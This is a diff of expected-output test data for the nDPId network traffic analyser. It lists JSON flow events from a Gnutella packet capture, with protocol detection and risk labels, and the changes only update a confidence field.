00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00783{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":431178,"flow_last_seen":599325,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":402,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":595449,"flow_last_seen":598465,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00783{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":431178,"flow_last_seen":599325,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":402,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":595449,"flow_last_seen":598465,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71541,"flow_last_seen":553212,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.100","src_port":28681,"dst_port":46385,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71541,"flow_last_seen":553212,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.100","src_port":28681,"dst_port":46385,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69141,"flow_last_seen":78169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -4010,11 +4010,11 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82060,"flow_last_seen":493285,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.69.142.133","src_port":28681,"dst_port":15471,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":312956,"flow_last_seen":493285,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.8.59.80","src_port":28681,"dst_port":35192,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":312956,"flow_last_seen":493285,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.8.59.80","src_port":28681,"dst_port":35192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599426,"flow_last_seen":599747,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599426,"flow_last_seen":599747,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599415,"flow_last_seen":599529,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":1544,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"finished","flow_packets_processed":2356,"flow_first_seen":114930,"flow_last_seen":546895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2191780,"flow_avg_l4_payload_len":930,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599415,"flow_last_seen":599529,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":1544,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"finished","flow_packets_processed":2356,"flow_first_seen":114930,"flow_last_seen":546895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2191780,"flow_avg_l4_payload_len":930,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -4055,13 +4055,13 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82061,"flow_last_seen":493284,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.131.24.72","src_port":28681,"dst_port":30711,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":99,"flow_first_seen":71205,"flow_last_seen":593737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":6090,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":99,"flow_first_seen":71205,"flow_last_seen":593737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":6090,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":520019,"flow_last_seen":523077,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":520019,"flow_last_seen":523077,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72852,"flow_last_seen":491978,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.250.99.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72852,"flow_last_seen":491978,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.250.99.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -4196,11 +4196,11 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490846,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":28681,"dst_port":8890,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 